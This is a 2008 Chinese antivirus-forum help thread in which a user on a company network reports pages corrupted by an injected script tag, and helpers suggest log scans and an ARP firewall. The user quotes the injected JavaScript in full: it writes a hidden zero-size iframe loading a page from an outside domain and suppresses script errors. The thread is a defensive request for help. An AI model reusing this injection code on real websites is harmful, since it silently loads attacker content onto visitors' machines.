昨天中路个病毒，请教怎么处理！在线等！！！ - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛昨天中路个病毒，请教怎么处理！在线等！！！

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

[求助] 昨天中路个病毒，请教怎么处理！在线等！！！

郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:	发表于： 2008-07-16 10:33 \| 只看楼主短消息资料字号：小中大 1楼昨天中路个病毒，请教怎么处理！在线等！！！昨天上了几个门户站，忽然发现页面字体比较乱，后来看原代码，不知道中了个什么病毒，至今还没搞定！请教各位！具体如下：在页面中都插入了这个代码：<script language="javascript" SRC="http://g.2b6fe62a.info/css.js"></script> 导致网页中字体变大或者半天乱，对不齐！请教怎么处理啊！！！！此JS文件如下： document.writeln("<script>"); document.writeln("function oK_Begin(){"); document.writeln("var Then = new Date() "); document.writeln("Then.setTime(Then.getTime() + 2460601000)"); document.writeln("var cookieString = new String(document.cookie)"); document.writeln("var cookieHeader = \"Cookie1=\" "); document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)"); document.writeln("if (beginPosition != -1){ "); document.writeln("} else "); document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() "); document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://g.2b6fe62a.info/ads.htm\"><\/iframe>\');"); document.writeln("}"); document.writeln("}"); document.writeln("oK_Begin();"); document.writeln("<\/script>"); document.writeln("<script>window.onerror=function(){return true;}<\/script>") 用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2)*
郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:	分享到：

aaccbbdd 卡卡巡查帖子:45933 注册: 2007-11-17 来自:蜀山仙剑派	发表于： 2008-07-16 10:38 \| 短消息资料字号：小中大 2楼回复：昨天中路个病毒，请教怎么处理！在线等！！！扫日志前关闭无用进程，如QQ，迅雷到大的软件站，如天空，太平洋，下载2.6正式版版的SReng（推荐） http://www.skycn.com/soft/45002.html SREng/智能扫描等扫描完成,保存日志(LOG格式) 日志以附件上传，贴到反病毒区或流行病毒区 PS：如主程序SREng**.exe无法运行,导致无法扫描日志将主程序改名为小狮子.bat
aaccbbdd 卡卡巡查帖子:45933 注册: 2007-11-17 来自:蜀山仙剑派

郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:	发表于： 2008-07-16 10:51 \| 只看楼主短消息资料字号：小中大 3楼回复: 昨天中路个病毒，请教怎么处理！在线等！！！恩，测试日志见附件，请教怎么处理！在线等！补充一下，这个病毒有时候出现又时候又没有，出现的时候就是网页版面乱，不出现的时候就正常了！附件: 文件名:SREngLOG.log 下载次数:112 文件类型:application/octet-stream 文件大小: 上传时间:2008-7-16 10:50:50 描述:log
郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:

aaccbbdd 卡卡巡查帖子:45933 注册: 2007-11-17 来自:蜀山仙剑派	发表于： 2008-07-16 10:58 \| 短消息资料字号：小中大 4楼回复：昨天中路个病毒，请教怎么处理！在线等！！！日志正常 Lz是不是在局域网？？
aaccbbdd 卡卡巡查帖子:45933 注册: 2007-11-17 来自:蜀山仙剑派

小日来了社区嘉宾帖子:3992 注册: 2008-06-18 来自:南京	发表于： 2008-07-16 11:02 \| 短消息资料字号：小中大 5楼回复: 昨天中路个病毒，请教怎么处理！在线等！！！用附件的工具，把这段代码，搜索并清除 http://g.2b6fe62a.info/css.js"></script> 附件: 文件名:iframekill.rar 下载次数:149 文件类型:application/octet-stream 文件大小: 上传时间:2008-7-16 11:01:36 描述:rar 我就是日不懂啊，没啥好介绍的
小日来了社区嘉宾帖子:3992 注册: 2008-06-18 来自:南京

郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:	发表于： 2008-07-16 11:05 \| 只看楼主短消息资料字号：小中大 6楼回复：昨天中路个病毒，请教怎么处理！在线等！！！对，公司局域网！没问题吗？反正出问题就是版面乱套，不出问题就都正常了！时好时坏啊，怎么处理呢？
郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:

郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:	发表于： 2008-07-16 11:07 \| 只看楼主短消息资料字号：小中大 7楼回复 5F 小日来了的帖子具体怎么做呀？多谢！
郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:

aaccbbdd 卡卡巡查帖子:45933 注册: 2007-11-17 来自:蜀山仙剑派	发表于： 2008-07-16 11:11 \| 短消息资料字号：小中大 8楼回复: 昨天中路个病毒，请教怎么处理！在线等！！！引用: 原帖由郁闷浪人于 2008-7-16 11:05:00 发表对，公司局域网！没问题吗？反正出问题就是版面乱套，不出问题就都正常了！时好时坏啊，怎么处理呢？ Lz安装360ARP防火墙 http://www.360.cn/down/soft_down11.html 单位的计算机都要安装！
aaccbbdd 卡卡巡查帖子:45933 注册: 2007-11-17 来自:蜀山仙剑派

郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:	发表于： 2008-07-16 11:13 \| 只看楼主短消息资料字号：小中大 9楼回复：昨天中路个病毒，请教怎么处理！在线等！！！啊，那个iframekill.rar也没搞定! 这个应该是网页病毒吧？？应该不是ARP病毒哦！
郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:

郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:	发表于： 2008-07-16 11:19 \| 只看楼主短消息资料字号：小中大 10楼回复: 昨天中路个病毒，请教怎么处理！在线等！！！ 01.jpg (139.38 K) 2008-7-16 11:18:43 02.jpg (194.75 K) 2008-7-16 11:18:43 第一个图是中病毒时页面没对齐，下面字很大，超出了框框范围！第二个图是网页源码，最上面一行就是插入的病毒代码。用雅虎助手和360安全卫士修复过IE，但没用！没人能解决吗？郁闷啊～继续在线等！
郁闷浪人初生襁褓狮帖子:13 注册: 2008-07-16 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT